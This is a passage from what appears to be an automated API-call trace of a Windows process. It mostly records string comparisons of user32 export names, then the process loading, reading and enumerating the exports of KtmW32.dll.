lpString2="AppendMenuA") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0272.644] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0272.644] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0272.644] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0272.645] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0272.645] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0272.645] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0272.645] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0272.645] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0272.645] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0272.645] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0272.645] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0272.645] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0272.645] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0272.645] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0272.645] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0272.645] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0272.645] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0272.645] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0272.645] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0272.645] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0272.645] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0272.646] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0272.646] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0272.646] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0272.646] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0272.646] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0272.647] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0272.647] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0272.647] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0272.647] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0272.647] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0272.647] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0272.648] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0272.648] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0272.649] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0272.649] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0272.649] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0272.649] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0272.649] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0272.649] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0272.649] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0272.649] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0272.649] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0272.649] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0272.649] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0272.649] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0272.650] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0272.651] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0272.652] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0272.653] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0272.654] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0272.654] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0272.654] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0272.654] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0272.654] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0272.654] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0272.654] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0272.654] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0272.654] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0273.410] GetProcessHeap () returned 0x400000 [0273.410] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x3ffb040 | out: hHeap=0x400000) returned 1 [0273.419] GetProcessHeap () returned 0x400000 [0273.419] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x419040 [0273.419] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0273.426] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0273.426] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0273.427] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0273.427] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0273.428] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0273.428] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0273.428] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0273.428] GetProcessHeap () returned 0x400000 [0273.428] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x5e00) returned 0x2c35030 [0273.428] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0273.428] ReadFile (in: hFile=0x17c, lpBuffer=0x2c35030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c35030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0273.430] CloseHandle (hObject=0x17c) returned 1 [0273.430] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0273.430] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0273.430] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0273.430] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0273.430] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0273.430] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0273.430] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0273.430] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0273.430] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0273.430] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0273.430] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0273.430] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0273.430] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0273.430] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0273.430] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0273.431] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0273.431] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0273.431] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0273.431] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0273.431] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0273.431] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0273.431] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0273.431] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0273.431] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0273.431] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0273.431] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0273.431] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0273.431] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0273.431] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0273.431] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0273.431] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0273.431] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0273.431] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0273.432] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0273.432] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0273.432] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0273.432] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0273.433] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0273.433] 